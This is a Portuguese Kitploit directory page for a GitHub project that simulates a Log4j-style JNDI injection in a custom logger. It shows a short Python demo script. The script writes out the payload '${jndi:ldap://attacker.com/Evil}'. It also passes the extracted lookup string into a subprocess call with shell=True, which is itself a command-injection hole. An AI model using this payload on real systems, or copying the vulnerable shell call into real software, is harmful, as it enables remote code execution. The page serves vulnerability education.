Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — Simula o CVE-2026-21011, uma injeção de JNDI no estilo Log4j em um logger personalizado: analisa padrões ${jndi:...} e demonstra execução remota de código acionada por LDAP. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

Simula o CVE-2026-21011, uma injeção de JNDI no estilo Log4j em um logger personalizado: analisa padrões ${jndi:...} e demonstra execução remota de código acionada por LDAP.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 17 diasAinda não revisado

CVE-2026-21011 – Injeção JNDI estilo Log4j em Logger Personalizado (Simulado)

Código do Programa (simulação em Java via Python)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – Injeção JNDI via Logger Personalizado

Severity: Critical

Visão Geral

Um framework de logging personalizado avalia padrões ${jndi:...} em mensagens de log, de forma semelhante à infame vulnerabilidade Log4Shell. Um atacante pode injetar uma consulta JNDI para carregar e executar código arbitrário de um servidor remoto.

Detalhes da Vulnerabilidade

  • Tipo: Injeção de Código / Injeção JNDI
  • Impacto: Execução Remota de Código.
  • Causa Raiz: O logger analisa dados controlados pelo usuário e realiza consultas dinâmicas com base no conteúdo.

Demonstração do Exploit

Execute a simulação:

root@kitploit:~
python log4j_sim.py

O script exibe que carregaria uma classe do servidor LDAP do atacante.

Baixar ferramenta